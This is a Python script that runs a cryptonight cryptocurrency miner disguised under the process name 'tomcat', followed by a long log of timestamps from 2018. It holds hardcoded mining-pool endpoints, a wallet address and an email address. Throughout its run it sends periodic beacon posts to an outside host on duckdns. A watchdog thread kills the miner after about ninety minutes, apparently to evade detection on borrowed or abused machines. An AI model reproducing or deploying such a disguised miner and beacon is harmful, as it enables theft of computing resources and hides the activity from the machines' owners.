import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:28:06.464889
#2018-02-17 17:15:05.885387
#2018-02-17 19:04:07.324417
#2018-02-17 20:53:07.142796
#2018-02-17 22:41:06.801867
#2018-02-18 00:25:05.316166
#2018-02-18 02:16:01.418452
#2018-02-18 04:02:04.848865
#2018-02-18 05:53:06.366545
#2018-02-18 07:44:05.411827
#2018-02-18 09:33:04.194150
#2018-02-18 11:19:05.476748
#2018-02-18 13:05:07.695517
#2018-02-18 14:53:06.443346
#2018-02-18 16:40:08.566701
#2018-02-18 18:29:01.286634
#2018-02-18 20:16:06.960240
#2018-02-18 22:01:04.505841
#2018-02-18 23:49:06.891578
#2018-02-19 01:35:07.508112
#2018-02-19 03:23:03.286863
#2018-02-19 05:08:04.109467
#2018-02-19 06:54:06.909806
#2018-02-19 08:42:07.182712
#2018-02-19 10:31:01.706463
#2018-02-19 12:18:07.020098
#2018-02-19 14:06:06.659425
#2018-02-19 15:55:07.298126
#2018-02-19 17:42:08.961942
#2018-02-19 19:30:11.370483
#2018-02-19 21:19:01.364220
#2018-02-19 23:04:06.015244
#2018-02-20 00:49:06.093650
#2018-02-20 02:40:02.008390
#2018-02-20 04:29:01.304371
#2018-02-20 06:13:05.623262
#2018-02-20 07:58:06.012519
#2018-02-20 09:43:06.708330
#2018-02-20 11:27:06.569266
#2018-02-20 13:14:01.790181
#2018-02-20 14:59:03.910859
#2018-02-20 16:45:01.508890
#2018-02-20 18:34:06.924391
#2018-02-20 20:26:02.308909
#2018-02-20 22:12:01.575825
#2018-02-20 23:55:06.800947
#2018-02-21 01:39:01.840072
#2018-02-21 03:26:07.457481
#2018-02-21 05:14:05.701263
#2018-02-21 07:03:06.736281
#2018-02-21 08:49:07.098997
#2018-02-21 10:37:05.487734
#2018-02-21 12:25:07.265542
#2018-02-21 14:12:06.538705
#2018-02-21 15:57:04.110550
#2018-02-21 17:49:08.171313
#2018-02-21 19:34:08.640391
#2018-02-21 21:23:07.240067
#2018-02-21 23:11:03.658537
#2018-02-22 01:01:08.673761
#2018-02-22 02:50:06.552536
#2018-02-22 04:37:03.714157
#2018-02-22 06:21:08.262230
#2018-02-22 08:08:07.495652
#2018-02-22 09:56:01.667826
#2018-02-22 11:39:10.192346
#2018-02-22 13:26:09.477277
#2018-02-22 15:15:03.727015
#2018-02-22 17:01:05.927661
#2018-02-22 18:49:01.602280
#2018-02-22 20:40:12.495849
#2018-02-22 22:27:05.480445
#2018-02-23 00:14:07.530369
#2018-02-23 02:02:07.967509
#2018-02-23 03:50:09.225864
#2018-02-23 05:40:08.605886
#2018-02-23 07:25:06.413632
#2018-02-23 09:29:04.276803
#2018-02-23 11:37:09.092796
#2018-02-23 13:27:05.758069
#2018-02-23 15:13:02.084231
#2018-02-23 17:01:05.631146
#2018-02-23 18:49:02.248889
#2018-02-23 20:36:03.498215
#2018-02-23 22:23:04.295952
#2018-02-24 00:09:08.446946
#2018-02-24 02:01:05.325254
#2018-02-24 03:51:03.409180
#2018-02-24 05:37:03.994173
#2018-02-24 07:24:04.667173
#2018-02-24 09:13:05.538849
#2018-02-24 11:09:07.053356
#2018-02-24 12:58:01.259273
#2018-02-24 14:46:05.511634
#2018-02-24 16:38:07.110423
#2018-02-24 18:27:06.324380
#2018-02-24 20:14:05.243562
#2018-02-24 22:04:05.031295
#2018-02-25 01:02:02.007000
#2018-02-25 04:40:08.599783
#2018-02-25 08:32:01.692630